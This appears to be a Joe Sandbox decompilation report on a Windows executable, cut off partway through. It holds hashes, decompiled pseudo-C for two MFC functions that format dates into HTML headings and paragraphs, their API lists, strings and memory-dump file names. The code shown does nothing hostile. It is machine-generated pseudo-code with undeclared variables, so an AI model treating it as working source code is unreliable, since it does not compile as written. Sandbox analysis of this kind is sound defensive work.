Opcode ID: 5090970e2fea83d9ea59332c1c2de4851e15bcf1bc54da3e54dbb83a00fc6ec9
Instruction ID: c923f164fefbe73baed3eb1623ca8ff66ad1f3258f969fd77c229349aa9e9fa8
Opcode Fuzzy Hash: 5090970e2fea83d9ea59332c1c2de4851e15bcf1bc54da3e54dbb83a00fc6ec9
Instruction Fuzzy Hash: 0D126C71C00248EEDF05EBE5D885EEEBFB8AF19304F1040AAF50577292DB385A45DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00429A65, Relevance: 112.4, APIs: 59, Strings: 5, Instructions: 423
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00429A65(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				short _t196;
				void* _t197;
				signed int _t200;
				signed int _t209;
				void* _t211;
				void* _t214;
				signed int _t223;
				CHAR* _t234;
				intOrPtr* _t236;
				intOrPtr _t237;
				void* _t238;
				intOrPtr* _t241;
				intOrPtr* _t245;
				intOrPtr _t246;
				void* _t247;
				void* _t249;
				void* _t250;
				void* _t251;
				void* _t252;
				char* _t258;
				void* _t278;
				void* _t289;
				void* _t329;
				intOrPtr _t333;
				signed int _t336;
				void* _t339;
				void* _t340;
				void* _t342;
				void* _t344;
				intOrPtr _t346;
				void* _t348;

				_t329 = __edx;
				E0043E4E0(0x4430fb, _t342);
				L0043DDD8();
				_t336 = 0;
				 *(_t342 - 4) = 0;
				L0043DDD8();
				 *(_t342 - 4) = 1;
				L0043DDD8();
				 *(_t342 - 4) = 2;
				L0043DDD8();
				 *(_t342 - 4) = 3;
				L0043DDD8();
				 *(_t342 - 4) = 4;
				L0043DDD8();
				 *(_t342 - 4) = 5;
				L0043DDD8();
				 *(_t342 - 4) = 6;
				 *((intOrPtr*)(_t342 - 0x2c)) = 0;
				memset(_t342 - 0xa4, 0, 0x10);
				memset(_t342 - 0x94, 0, 0x10);
				memset(_t342 - 0xb4, 0, 0x10);
				_t346 = _t344 - 0xe8 + 0x24;
				 *(_t342 - 0xa4) = 0x7bc;
				 *(_t342 - 0x94) = 0x7e4;
				_t196 = 1;
				 *((short*)(_t342 - 0x92)) = _t196;
				 *((short*)(_t342 - 0x8e)) = _t196;
				 *((short*)(_t342 - 0xa2)) = _t196;
				 *((short*)(_t342 - 0x9e)) = _t196;
				_t197 = L00404A04(_t196, _t342 - 0xf4, 0);
				_push( *((intOrPtr*)(_t342 + 8)));
				 *(_t342 - 4) = 7;
				if(L00404D87(_t197, _t342 - 0xf4, 0) == 0) {
					L32:
					 *(_t342 - 4) = 6;
					L00404A5A(_t198, _t342 - 0xf4, _t336);
					 *(_t342 - 4) = 5;
					L0043DD36();
					 *(_t342 - 4) = 4;
					L0043DD36();
					 *(_t342 - 4) = 3;
					L0043DD36();
					 *(_t342 - 4) = 2;
					L0043DD36();
					 *(_t342 - 4) = 1;
					L0043DD36();
					 *(_t342 - 4) =  *(_t342 - 4) & 0x00000000;
					L0043DD36();
					 *(_t342 - 4) =  *(_t342 - 4) | 0xffffffff;
					L0043DD36();
					_t200 = _t336;
					L34:
					 *[fs:0x0] =  *((intOrPtr*)(_t342 - 0xc));
					return _t200;
				}
				L00404E5D(_t198, _t342 - 0xf4, 0);
				_t278 = _t342 - 0xf4;
				_push(_t342 - 0x2c);
				_push(_t342 - 0x84);
				_push(_t342 - 0x20);
				_push(_t342 - 0x10);
				_push(_t342 - 0x14);
				_push(_t342 - 0x1c);
				_push(_t342 - 0x18);
				 *((intOrPtr*)(_t342 - 0x34)) = 0;
				_t209 = L00404AAC(_t342 - 0x18, _t278, 0);
				asm("sbb eax, eax");
				_t211 =  ~_t209 + 1;
				if( *((intOrPtr*)(_t342 - 0x2c)) != 0) {
					L33:
					 *(_t342 - 4) = 6;
					L00404A5A(_t211, _t342 - 0xf4, _t336);
					 *(_t342 - 4) = 5;
					L0043DD36();
					 *(_t342 - 4) = 4;
					L0043DD36();
					 *(_t342 - 4) = 3;
					L0043DD36();
					 *(_t342 - 4) = 2;
					L0043DD36();
					 *(_t342 - 4) = 1;
					L0043DD36();
					 *(_t342 - 4) =  *(_t342 - 4) & 0x00000000;
					L0043DD36();
					 *(_t342 - 4) =  *(_t342 - 4) | 0xffffffff;
					L0043DD36();
					_t200 = 0;
					goto L34;
				}
				_t258 = "<P>";
				while(_t211 == _t336) {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(_t278);
					_t336 = _t342 - 0x00000084 | 0xffffffff;
					 *((intOrPtr*)(_t342 - 0x54)) = _t346;
					_t333 = 0;
					_push(_t336);
					_push(_t342 - 0xa4);
					 *((short*)(_t342 - 0x42)) = 0;
					 *((short*)(_t342 - 0x44)) = 0;
					L0043E4BC();
					_t214 = _t342 - 0x4c;
					_push(_t336);
					_push(_t214);
					L0043E4BC();
					_t289 = _t214;
					if(L0042387B(_t214, _t258, _t329, 0, _t336) != 0) {
						_push(_t289);
						 *((intOrPtr*)(_t342 - 0x54)) = _t346;
						_push(_t336);
						_push(_t342 - 0x94);
						L0043E4BC();
						_t226 = _t342 - 0x4c;
						_push(_t336);
						L0043E4BC();
						_t292 = _t342 - 0x4c;
						if(E00429801(_t342 - 0x4c, _t226) != 0) {
							_push( *((intOrPtr*)(E00429098(_t292, _t342 - 0x5c, _t342 - 0x84))));
							 *(_t342 - 4) = 8;
							_push("<H1>&nbsp;%s</H1>");
							_push(_t342 - 0x24);
							L0043E174();
							_t348 = _t346 + 0xc;
							 *(_t342 - 4) = 7;
							L0043DD36();
							if( *((intOrPtr*)(_t342 - 0xae)) !=  *((intOrPtr*)(_t342 - 0x46)) ||  *((intOrPtr*)(_t342 - 0xb2)) !=  *((intOrPtr*)(_t342 - 0x4a)) ||  *(_t342 - 0xb4) !=  *(_t342 - 0x4c)) {
								_push(_t342 - 0x24);
								L0043DE1A();
							}
							L0043E0D8();
							_t234 =  *(_t342 - 0x14);
							if( *((intOrPtr*)(_t234 - 8)) != _t333) {
								CharUpperBuffA(_t234, 1);
							}
							_push( *((intOrPtr*)(_t342 - 0x10)));
							_t236 =  *((intOrPtr*)(E00409643(_t342 - 0x38)));
							 *(_t342 - 4) = 9;
							if(_t236 == _t333) {
								_t237 = 0;
							} else {
								_t237 =  *_t236;
							}
							_t238 = E00429215(_t342 + 8, _t237, _t342 + 8);
							_t339 = _t238;
							 *(_t342 - 4) = 7;
							_t302 =  *((intOrPtr*)(_t342 - 0x38));
							if( *((intOrPtr*)(_t342 - 0x38)) != _t333) {
								_t238 = E004096DD(_t302);
								 *((intOrPtr*)(_t342 - 0x38)) = _t333;
							}
							if(_t339 != _t333) {
								L0043E144();
								 *(_t342 - 4) = 0xa;
								L0043DFCA();
								_t302 = _t342 - 0x6c;
								 *(_t342 - 4) = 7;
								L0043DD36();
								__imp__#6( *((intOrPtr*)(_t342 + 8)), _t238,  *((intOrPtr*)(_t342 + 8)));
							}
							_t241 = E004290DB(_t302, _t342 - 0x50, _t342 - 0x84);
							_push( *((intOrPtr*)(_t342 - 0x10)));
							 *(_t342 - 4) = 0xb;
							_push( *_t241);
							_push( *(_t342 - 0x14));
							_push( *((intOrPtr*)(_t342 - 0x1c)));
							_push("<H2>%s - %s, %s</H2><H3>%s</H3>\r\n");
							_push(_t342 - 0x28);
							L0043E174();
							_t346 = _t348 + 0x18;
							 *(_t342 - 4) = 7;
							L0043DD36();
							_push(_t342 - 0x28);
							L0043DE1A();
							_push( *((intOrPtr*)(_t342 - 0x18)));
							_t245 =  *((intOrPtr*)(E00409643(_t342 - 0x3c)));
							 *(_t342 - 4) = 0xc;
							if(_t245 == _t333) {
								_t246 = 0;
							} else {
								_t246 =  *_t245;
							}
							_t247 = E00429215(_t342 + 8, _t246, _t342 + 8);
							_t340 = _t247;
							 *(_t342 - 4) = 7;
							_t311 =  *((intOrPtr*)(_t342 - 0x3c));
							if( *((intOrPtr*)(_t342 - 0x3c)) != _t333) {
								_t247 = E004096DD(_t311);
								 *((intOrPtr*)(_t342 - 0x3c)) = _t333;
							}
							if(_t340 == _t333) {
								_push("<BR>");
								_push("\r\n");
								L0043E156();
								_push(_t342 - 0x18);
								_t249 = _t342 - 0x58;
								_push(_t258);
								_push(_t249);
								L0043E168();
								_push("</P>\r\n");
								_push(_t249);
								_t250 = _t342 - 0x74;
								 *(_t342 - 4) = 0x12;
								_push(_t250);
								L0043DE20();
								_push(_t250);
								 *(_t342 - 4) = 0x13;
								L0043DE1A();
								 *(_t342 - 4) = 0x12;
								L0043DD36();
								 *(_t342 - 4) = 7;
							} else {
								L0043E144();
								 *(_t342 - 4) = 0xd;
								L0043E156();
								L0043DE26();
								 *(_t342 - 4) = 0xe;
								L0043DE26();
								 *(_t342 - 4) = 0xf;
								_t251 = _t342 - 0x60;
								L0043E282();
								_t252 = _t342 - 0x64;
								 *(_t342 - 4) = 0x10;
								L0043E282();
								 *(_t342 - 4) = 0x11;
								L0043DE1A();
								 *(_t342 - 4) = 0x10;
								L0043DD36();
								 *(_t342 - 4) = 0xf;
								L0043DD36();
								 *(_t342 - 4) = 0xe;
								L0043DD36();
								 *(_t342 - 4) = 0xd;
								L0043DD36();
								__imp__#6( *((intOrPtr*)(_t342 + 8)), _t252, _t252, _t251, _t247, _t251, _t247, _t342 - 0x30, _t258, "</P>\r\n", "\r\n", "<BR>",  *((intOrPtr*)(_t342 + 8)));
								 *(_t342 - 4) = 7;
							}
							L0043DD36();
							_t336 = _t342 - 0x4c;
							asm("movsd");
							asm("movsd");
							 *((intOrPtr*)(_t342 - 0x34)) =  *((intOrPtr*)(_t342 - 0x34)) + 1;
							asm("movsd");
							asm("movsd");
							_t333 = 0;
						}
					}
					_t278 = _t342 - 0xf4;
					_push(_t342 - 0x2c);
					_push(_t342 - 0x84);
					_push(_t342 - 0x20);
					_push(_t342 - 0x10);
					_push(_t342 - 0x14);
					_push(_t342 - 0x1c);
					_push(_t342 - 0x18);
					_t223 = L00404AAC(_t342 - 0x18, _t278, _t336);
					asm("sbb eax, eax");
					_t211 =  ~_t223 + 1;
					if( *((intOrPtr*)(_t342 - 0x2c)) == _t333) {
						_t336 = 0;
						continue;
					} else {
						if( *((intOrPtr*)(_t342 - 0x34)) == 0) {
							goto L33;
						}
						_t336 = 1;
						goto L32;
					}
				}
				goto L33;
			}

0x00429a65
0x00429a6a
0x00429a7b
0x00429a80
0x00429a85
0x00429a88
0x00429a90
0x00429a94
0x00429a9c
0x00429aa0
0x00429aa8
0x00429aac
0x00429ab4
0x00429ab8
0x00429ac0
0x00429ac4
0x00429ad3
0x00429ad7
0x00429ada
0x00429ae9
0x00429af8
0x00429afd
0x00429b06
0x00429b0f
0x00429b1a
0x00429b1b
0x00429b22
0x00429b29
0x00429b30
0x00429b37
0x00429b3c
0x00429b45
0x00429b50
0x00429eff
0x00429f05
0x00429f09
0x00429f11
0x00429f15
0x00429f1d
0x00429f21
0x00429f29
0x00429f2d
0x00429f35
0x00429f39
0x00429f41
0x00429f45
0x00429f4a
0x00429f51
0x00429f56
0x00429f5d
0x00429f62
0x00429fcb
0x00429fd0
0x00429fd9
0x00429fd9
0x00429b5c
0x00429b64
0x00429b6a
0x00429b71
0x00429b75
0x00429b79
0x00429b7d
0x00429b81
0x00429b85
0x00429b86
0x00429b89
0x00429b90
0x00429b92
0x00429b96
0x00429f66
0x00429f6c
0x00429f70
0x00429f78
0x00429f7c
0x00429f84
0x00429f88
0x00429f90
0x00429f94
0x00429f9c
0x00429fa0
0x00429fa8
0x00429fac
0x00429fb1
0x00429fb8
0x00429fbd
0x00429fc4
0x00429fc9
0x00000000
0x00429fc9
0x00429b9c
0x00429ba5
0x00429bb6
0x00429bb7
0x00429bb8
0x00429bb9
0x00429bba
0x00429bbb
0x00429bc0
0x00429bc9
0x00429bcb
0x00429bcc
0x00429bcd
0x00429bd1
0x00429bd5
0x00429bda
0x00429bdd
0x00429bde
0x00429be5
0x00429bea
0x00429bf3
0x00429bf9
0x00429c02
0x00429c05
0x00429c06
0x00429c07
0x00429c0c
0x00429c0f
0x00429c17
0x00429c1c
0x00429c25
0x00429c3d
0x00429c42
0x00429c46
0x00429c4b
0x00429c4c
0x00429c51
0x00429c57
0x00429c5b
0x00429c6b
0x00429c8d
0x00429c8e
0x00429c8e
0x00429c96
0x00429c9b
0x00429ca1
0x00429ca6
0x00429ca6
0x00429cac
0x00429cb7
0x00429cb9
0x00429cbf
0x00429cc5
0x00429cc1
0x00429cc1
0x00429cc1
0x00429ccc
0x00429cd2
0x00429cd5
0x00429cd9
0x00429cde
0x00429ce0
0x00429ce5
0x00429ce5
0x00429cea
0x00429cf2
0x00429cfb
0x00429cff
0x00429d04
0x00429d07
0x00429d0b
0x00429d13
0x00429d13
0x00429d24
0x00429d2b
0x00429d2e
0x00429d32
0x00429d37
0x00429d3a
0x00429d3d
0x00429d42
0x00429d43
0x00429d48
0x00429d4e
0x00429d52
0x00429d5d
0x00429d5e
0x00429d63
0x00429d6e
0x00429d70
0x00429d76
0x00429d7c
0x00429d78
0x00429d78
0x00429d78
0x00429d83
0x00429d89
0x00429d8c
0x00429d90
0x00429d95
0x00429d97
0x00429d9c
0x00429d9c
0x00429da1
0x00429e54
0x00429e59
0x00429e61
0x00429e69
0x00429e6a
0x00429e6d
0x00429e6e
0x00429e6f
0x00429e74
0x00429e79
0x00429e7a
0x00429e7d
0x00429e81
0x00429e82
0x00429e8a
0x00429e8b
0x00429e8f
0x00429e97
0x00429e9b
0x00429ea0
0x00429da7
0x00429dad
0x00429dbf
0x00429dc3
0x00429dd0
0x00429ddb
0x00429ddf
0x00429de7
0x00429ded
0x00429df1
0x00429df8
0x00429dfb
0x00429e00
0x00429e09
0x00429e0d
0x00429e15
0x00429e19
0x00429e21
0x00429e25
0x00429e2d
0x00429e31
0x00429e39
0x00429e3d
0x00429e45
0x00429e4b
0x00429e4f
0x00429ea7
0x00429eac
0x00429eb5
0x00429eb6
0x00429eb7
0x00429eba
0x00429ebb
0x00429ebc
0x00429ebc
0x00429c25
0x00429ec1
0x00429ec7
0x00429ece
0x00429ed2
0x00429ed6
0x00429eda
0x00429ede
0x00429ee2
0x00429ee3
0x00429eea
0x00429eec
0x00429ef0
0x00429ba3
0x00000000
0x00429ef6
0x00429efa
0x00000000
0x00000000
0x00429efe
0x00000000
0x00429efe
0x00429ef0
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00429A6A
#540.MFC42(?,00000001,00000000), ref: 00429A7B
#540.MFC42(?,00000001,00000000), ref: 00429A88
#540.MFC42(?,00000001,00000000), ref: 00429A94
#540.MFC42(?,00000001,00000000), ref: 00429AA0
#540.MFC42(?,00000001,00000000), ref: 00429AAC
#540.MFC42(?,00000001,00000000), ref: 00429AB8
#540.MFC42(?,00000001,00000000), ref: 00429AC4
memset.MSVCRT ref: 00429ADA
memset.MSVCRT ref: 00429AE9
memset.MSVCRT ref: 00429AF8
#548.MFC42(000007BC,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429BD5
#548.MFC42(?,?,000007BC,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429BE5
#548.MFC42(000007E4,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429C07
#548.MFC42(?,?,000007E4,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429C17

Part of subcall function 00429098: GetDateFormatA.KERNEL32(00000400,00000000,?,dddd, d MMMM,00455B1C,00000032,?,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290BD
Part of subcall function 00429098: CharUpperBuffA.USER32(00455B1C,00000001,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290C6
Part of subcall function 00429098: #537.MFC42(00455B1C,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290D0

#2818.MFC42(?,<H1> %s</H1>,00000000,?,?,000007E4,?), ref: 00429C4C
#800.MFC42(?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429C5B
#939.MFC42(?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429C8E
#4202.MFC42(?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429C96
CharUpperBuffA.USER32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429CA6
#539.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429CF2
#858.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429CFF
#800.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429D0B
SysFreeString.OLEAUT32(?), ref: 00429D13
#2818.MFC42(?,<H2>%s - %s, %s</H2><H3>%s</H3>,?,?,00000000,?,?,?), ref: 00429D43
#800.MFC42(?,?,?,?,?,?), ref: 00429D52
#939.MFC42(?,?,?,?,?,?,?), ref: 00429D5E
#539.MFC42(?,?,?,?,?,?,?,?,?), ref: 00429DAD
#6877.MFC42(00453C48,<BR>,?,?,?,?,?,?,?,?,?), ref: 00429DC3
#537.MFC42(</P>,00453C48,<BR>,?,?,?,?,?,?,?,?,?), ref: 00429DD0
#537.MFC42(<P>,</P>,00453C48,<BR>,?,?,?,?,?,?,?,?,?), ref: 00429DDF
#922.MFC42(?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?,?,?,?,?,?,?), ref: 00429DF1
#922.MFC42(?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 00429E00
#939.MFC42(00000000,?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 00429E0D
#800.MFC42(00000000,?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 00429E19
#800.MFC42(00000000,?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 00429E25
#800.MFC42(00000000,?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 00429E31
#800.MFC42(00000000,?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 00429E3D
SysFreeString.OLEAUT32(?), ref: 00429E45
#6877.MFC42(00453C48,<BR>,?,?,?,?,?,?,?,?), ref: 00429E61
#926.MFC42(?,<P>,?,00453C48,<BR>,?,?,?,?,?,?,?,?), ref: 00429E6F
#924.MFC42(?,00000000,</P>,?,<P>,?,00453C48,<BR>,?,?,?,?,?,?,?,?), ref: 00429E82
#939.MFC42(00000000,?,00000000,</P>,?,<P>,?,00453C48,<BR>,?,?,?,?,?,?,?), ref: 00429E8F
#800.MFC42(00000000,?,00000000,</P>,?,<P>,?,00453C48,<BR>,?,?,?,?,?,?,?), ref: 00429E9B
#800.MFC42(00000000,?,00000000,</P>,?,<P>,?,00453C48,<BR>,?,?,?,?,?,?,?), ref: 00429EA7
#800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429F15
#800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429F21
#800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429F2D
#800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429F39
#800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429F45
#800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429F51
#800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429F5D
#800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429F7C
#800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429F88
#800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429F94
#800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429FA0
#800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429FAC
#800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429FB8
#800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429FC4

Strings

</P>, xrefs: 00429DC8, 00429E74
<H2>%s - %s, %s</H2><H3>%s</H3>, xrefs: 00429D3D
<P>, xrefs: 00429B9C, 00429DD7, 00429E6D
<H1> %s</H1>, xrefs: 00429C46
<BR>, xrefs: 00429DB2, 00429E54

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#540$#548#939$#537memset$#2818#539#6877#922BuffCharFreeStringUpper$#4202#858#924#926DateFormatH_prolog
String ID: </P>$<BR>$<H1> %s</H1>$<H2>%s - %s, %s</H2><H3>%s</H3>$<P>
API String ID: 157677795-1072282055
Opcode ID: 0ee7da26b07e629534eb8460bce09e22430eeaca6311155f09fb6cb996764f31
Instruction ID: 40827c39c313d85a24ee7feb803662c734e88c338ce95b615f2a86b246eb5e4b
Opcode Fuzzy Hash: 0ee7da26b07e629534eb8460bce09e22430eeaca6311155f09fb6cb996764f31
Instruction Fuzzy Hash: DA029231D0025DEACF15EBE5D941BEEBBB8AF19308F10409EE405B7282DB781B49DB65

Uniqueness

Uniqueness Score: -1.00%

Function 004292F3, Relevance: 101.9, APIs: 53, Strings: 5, Instructions: 395
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004292F3(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t172;
				void* _t173;
				signed int _t176;
				short _t181;
				void* _t183;
				signed int _t190;
				void* _t192;
				void* _t195;
				signed int _t202;
				CHAR* _t213;
				intOrPtr* _t215;
				intOrPtr _t216;
				void* _t217;
				intOrPtr* _t220;
				intOrPtr* _t224;
				intOrPtr _t225;
				void* _t226;
				void* _t228;
				void* _t229;
				void* _t230;
				void* _t231;
				char* _t237;
				void* _t248;
				void* _t257;
				void* _t302;
				void* _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t318;
				intOrPtr _t320;
				void* _t321;

				_t302 = __edx;
				_t172 = E0043E4E0(0x442ff7, _t315);
				_t318 = _t317 - 0xe0;
				_push(_t308);
				_t173 = L00405A94(_t172, _t315 - 0xec, _t308);
				_push( *((intOrPtr*)(_t315 + 8)));
				_t309 = 0;
				 *(_t315 - 4) = 0;
				if(L00405B3C(_t173, _t315 - 0xec, 0) == 0) {
					L32:
					 *(_t315 - 4) =  *(_t315 - 4) | 0xffffffff;
					L00405AEA(_t174, _t315 - 0xec, _t309);
					_t176 = _t309;
					L34:
					 *[fs:0x0] =  *((intOrPtr*)(_t315 - 0xc));
					return _t176;
				}
				L0043DDD8();
				 *(_t315 - 4) = 1;
				L0043DDD8();
				 *(_t315 - 4) = 2;
				L0043DDD8();
				 *(_t315 - 4) = 3;
				L0043DDD8();
				 *(_t315 - 4) = 4;
				L0043DDD8();
				 *(_t315 - 4) = 5;
				memset(_t315 - 0x9c, 0, 0x10);
				memset(_t315 - 0x8c, 0, 0x10);
				 *(_t315 - 0x9c) = 0x7bc;
				_t181 = 1;
				 *(_t315 - 0x8c) = 0x7e4;
				 *((short*)(_t315 - 0x8a)) = _t181;
				 *((short*)(_t315 - 0x86)) = _t181;
				 *((short*)(_t315 - 0x9a)) = _t181;
				 *((short*)(_t315 - 0x96)) = _t181;
				_t183 = memset(_t315 - 0xac, 0, 0x10);
				_t320 = _t318 + 0x24;
				 *((intOrPtr*)(_t315 - 0x24)) = 0;
				L00405E26(_t183, _t315 - 0xec, 0);
				_t248 = _t315 - 0xec;
				_push(_t315 - 0x24);
				_push(_t315 - 0x7c);
				_push(_t315 - 0x18);
				_push(_t315 - 0x10);
				_push(_t315 - 0x14);
				 *((intOrPtr*)(_t315 - 0x2c)) = 0;
				_t190 = L00405C12(_t315 - 0x14, _t248, 0);
				asm("sbb eax, eax");
				_t192 =  ~_t190 + 1;
				if( *((intOrPtr*)(_t315 - 0x24)) != 0) {
					L33:
					 *(_t315 - 4) = 4;
					L0043DD36();
					 *(_t315 - 4) = 3;
					L0043DD36();
					 *(_t315 - 4) = 2;
					L0043DD36();
					 *(_t315 - 4) = 1;
					L0043DD36();
					 *(_t315 - 4) =  *(_t315 - 4) & 0x00000000;
					L0043DD36();
					 *(_t315 - 4) =  *(_t315 - 4) | 0xffffffff;
					L00405AEA(_t192, _t315 - 0xec, _t309);
					_t176 = 0;
					goto L34;
				}
				_t237 = "<P>";
				while(_t192 == _t309) {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(_t248);
					_t309 = _t315 - 0x0000007c | 0xffffffff;
					 *((intOrPtr*)(_t315 - 0x4c)) = _t320;
					_push(_t309);
					_push(_t315 - 0x9c);
					 *((short*)(_t315 - 0x3a)) = 1;
					 *((short*)(_t315 - 0x3c)) = 1;
					L0043E4BC();
					_t195 = _t315 - 0x44;
					_push(_t309);
					_push(_t195);
					L0043E4BC();
					_t257 = _t195;
					if(L0042387B(_t195, _t237, _t302, _t315 - 0x44, _t309) != 0) {
						_push(_t257);
						 *((intOrPtr*)(_t315 - 0x4c)) = _t320;
						_push(_t309);
						_push(_t315 - 0x8c);
						L0043E4BC();
						_t205 = _t315 - 0x44;
						_push(_t309);
						L0043E4BC();
						_t265 = _t315 - 0x44;
						if(E00429801(_t315 - 0x44, _t205) != 0) {
							_push( *((intOrPtr*)(E00429098(_t265, _t315 - 0x5c, _t315 - 0x7c))));
							 *(_t315 - 4) = 6;
							_push("<H1>&nbsp;%s</H1>");
							_push(_t315 - 0x20);
							L0043E174();
							_t321 = _t320 + 0xc;
							 *(_t315 - 4) = 5;
							L0043DD36();
							if( *((intOrPtr*)(_t315 - 0xa6)) !=  *((intOrPtr*)(_t315 - 0x3e)) ||  *((intOrPtr*)(_t315 - 0xaa)) !=  *((intOrPtr*)(_t315 - 0x42)) ||  *(_t315 - 0xac) !=  *(_t315 - 0x44)) {
								_push(_t315 - 0x20);
								L0043DE1A();
							}
							L0043E0D8();
							_t213 =  *(_t315 - 0x10);
							if( *((intOrPtr*)(_t213 - 8)) != 0) {
								CharUpperBuffA(_t213, 1);
							}
							_push( *((intOrPtr*)(_t315 - 0x18)));
							_t215 =  *((intOrPtr*)(E00409643(_t315 - 0x30)));
							 *(_t315 - 4) = 7;
							if(_t215 == 0) {
								_t216 = 0;
							} else {
								_t216 =  *_t215;
							}
							_t217 = E00429215(_t315 + 8, _t216, _t315 + 8);
							_t312 = _t217;
							 *(_t315 - 4) = 5;
							_t275 =  *((intOrPtr*)(_t315 - 0x30));
							if( *((intOrPtr*)(_t315 - 0x30)) != 0) {
								_t217 = E004096DD(_t275);
								 *((intOrPtr*)(_t315 - 0x30)) = 0;
							}
							if(_t312 != 0) {
								L0043E144();
								 *(_t315 - 4) = 8;
								L0043DFCA();
								_t275 = _t315 - 0x64;
								 *(_t315 - 4) = 5;
								L0043DD36();
								__imp__#6( *((intOrPtr*)(_t315 + 8)), _t217,  *((intOrPtr*)(_t315 + 8)));
							}
							_t220 = E004290DB(_t275, _t315 - 0x54, _t315 - 0x7c);
							_push( *((intOrPtr*)(_t315 - 0x18)));
							 *(_t315 - 4) = 9;
							_push( *_t220);
							_push( *(_t315 - 0x10));
							_push("<H2>%s, %s</H2><H3>%s</H3>\r\n");
							_push(_t315 - 0x1c);
							L0043E174();
							_t320 = _t321 + 0x14;
							 *(_t315 - 4) = 5;
							L0043DD36();
							_push(_t315 - 0x1c);
							L0043DE1A();
							_push( *((intOrPtr*)(_t315 - 0x14)));
							_t224 =  *((intOrPtr*)(E00409643(_t315 - 0x34)));
							 *(_t315 - 4) = 0xa;
							if(_t224 == 0) {
								_t225 = 0;
							} else {
								_t225 =  *_t224;
							}
							_t226 = E00429215(_t315 + 8, _t225, _t315 + 8);
							_t313 = _t226;
							 *(_t315 - 4) = 5;
							_t284 =  *((intOrPtr*)(_t315 - 0x34));
							if( *((intOrPtr*)(_t315 - 0x34)) != 0) {
								_t226 = E004096DD(_t284);
								 *((intOrPtr*)(_t315 - 0x34)) = 0;
							}
							if(_t313 == 0) {
								_push("<BR>");
								_push("\r\n");
								L0043E156();
								_push(_t315 - 0x14);
								_t228 = _t315 - 0x50;
								_push(_t237);
								_push(_t228);
								L0043E168();
								_push("</P>\r\n");
								_push(_t228);
								_t229 = _t315 - 0x6c;
								 *(_t315 - 4) = 0x10;
								_push(_t229);
								L0043DE20();
